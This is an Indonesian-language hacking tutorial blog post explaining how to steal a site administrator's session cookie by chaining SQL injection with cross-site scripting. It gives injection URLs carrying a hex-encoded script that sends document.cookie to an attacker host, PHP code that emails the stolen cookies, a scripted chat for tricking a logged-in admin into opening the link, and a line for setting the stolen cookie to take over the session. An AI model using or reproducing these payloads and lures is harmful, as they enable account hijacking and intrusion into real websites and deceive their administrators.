Cookie Stealing over SQL Injection

chmood

dari SQLInjection kita bisa mencuri cookies dari sang admin. benarkah? benar banget.

klo kita sudah dapet username + password, tapi gak bisa decrypt, dan tetep gak bisa masuk, ada baiknya mencoba trik ini.

tekniknya sama persis dengan deface temporer melalui sql.

contoh

www.embuh.php?id=-1+union+select+1,2,3,4,5--

trus yang keluar adalah angga 3. maka kita inject di angka 3 tersebut. apa yang di inject? bukan command sql, tetapi javascript kayak gini:

<script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie\";</script>

so, kayak gini:

www.embuh.php?id=-1+union+select+1,2,\'<script>window.location=\"http://www.site-attacker.com/log-xss.php?cookie=document.cookie+\'\\nsite:www.embuh.com\'\";</script>\',4,5--

kemudian coba. pasti error. hehehe. maka, kita harus mengenkripsinya kedalam hexa biar bisa dibaca oleh mysql.
convertnya disini:

http://tools.explorecrew.org/enc-dec.php?cat=enc

masukin tuh javascript. hasilnya kayak gini:

266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b



nah, trus masukin ke injeksi sql. jangan lupa di depanya kasih 0x. jadinya kayak gini (ini hanya contoh, sesuaikan dgn kebutuhan):

www.embuh.php?id=-1+union+select+1,2,0x266c743b7363726970742667743b77696e646f772e6c6f636174696f6e3d5c2671756f743b687474703a2f2f7777772e736974652d61747461636b65722e636f6d2f6c6f672d7873732e7068703f636f6f6b69653d646f63756d656e742e636f6f6b69655c2671756f743b3b266c743b2f7363726970742667743b,4,5--



buat ngelog filenya, cukup gini aja:

log-xss.php

$email = \"[email protected]\";
$headers = \"From: [email protected]\\r\\n\" .
\"Reply-To: [email protected]\\r\\n\" .
\"X-Mailer: PHP/\".phpversion();

$isi = $_GET[cookie];

@mail($email, \"cookie log\", $isi, $headers);

//jangan lupa redirek ke siet sasaran lagi
header(\"location: http://www.embuh.com\");




nah, trus maen soceng sedikit ke admin, kirim email ke admin ato ngechat via fb/ym/apa aja deh yg penting sampe ke si admin.

A <- aq
M <- mimin

A: hay min...
M: halo bro
A: ada bug tuh di site ente
M: masa sih. coba mana buktinya
A: di bilangin kok gak percaya. coba situ login admin <--- suruh admin login dulu. kan kita mau nyuri cookie nya dia.
M: iya ini udah login
A: nah, coba u buka nih link, keliatan jelas banget ada bug di site ente
A: nih: [url yg tadi udah di injeksi]
M: oke deh. tekape
M: eh kok ngeblank ya? redirek ke halaman laen gitu
A: y ntuh bug nye. segera y perbaiki ya
M: oke deh. tengkiyu :* <--- admin nya agak maho





cookie akan terkirim ke email. buka cookie. misal dapetnya kayak gini:
dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl

buka site sasaran. lalu dengan sedikit javascript injection, masukkan cookie ke browser.

javascript:void(document.cookie=\"dlfkjslfkjs984ry09dlskfjdslfjdsfds;fldskfljdsflkjdskl\");



ato dengan tool cookie setter yg u punya deh.



trus buka halaman admin nya. dan, selamat menikmati... :)
Komentar